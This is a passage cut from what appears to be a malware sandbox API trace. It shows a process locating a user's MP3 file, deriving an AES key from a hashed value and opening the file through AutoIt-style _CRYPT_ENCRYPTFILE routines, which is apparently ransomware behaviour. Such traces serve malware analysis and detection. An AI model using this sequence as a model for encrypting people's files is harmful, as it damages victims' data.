ftLastAccessTime.dwLowDateTime=0xc82411d0, ftLastAccessTime.dwHighDateTime=0x1d5dceb, ftLastWriteTime.dwLowDateTime=0xc82411d0, ftLastWriteTime.dwHighDateTime=0x1d5dceb, nFileSizeHigh=0x0, nFileSizeLow=0x182d4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="RRCvJ.mp3", cAlternateFileName="")) returned 0x90add8 [0187.738] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0187.738] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RRCvJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.741] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.741] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0187.741] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0187.741] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.742] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.742] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.742] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.742] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.742] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b458d70, ftCreationTime.dwHighDateTime=0x1d5e70e, ftLastAccessTime.dwLowDateTime=0xc82411d0, ftLastAccessTime.dwHighDateTime=0x1d5dceb, ftLastWriteTime.dwLowDateTime=0xc82411d0, ftLastWriteTime.dwHighDateTime=0x1d5dceb, nFileSizeHigh=0x0, nFileSizeLow=0x182d4, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="RRCvJ.mp3", cAlternateFileName="")) returned 0x90af58 [0187.742] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0187.742] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.742] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.743] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0187.743] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0187.743] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.743] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.743] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0187.744] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0187.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.744] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0187.744] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.744] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.745] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.745] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.745] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0187.745] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0187.745] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.756] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.756] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0187.756] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.756] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.756] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.756] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0187.756] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.757] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.757] CryptDestroyHash (hHash=0x90ae18) returned 1 [0187.757] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\rrcvj.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0187.758] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.758] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0187.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0187.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0187.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0187.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0187.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0187.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0187.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0187.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.759] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0187.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0187.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0187.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0187.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0187.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0187.759] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0187.759] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0187.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0187.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0187.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0187.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0187.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0187.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0187.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0187.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0187.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0187.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0187.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0187.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0187.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0187.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0187.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0187.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0187.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0187.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0187.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0187.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0187.761] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol")) returned 0x10 [0187.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0187.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0187.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0187.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0187.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0187.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 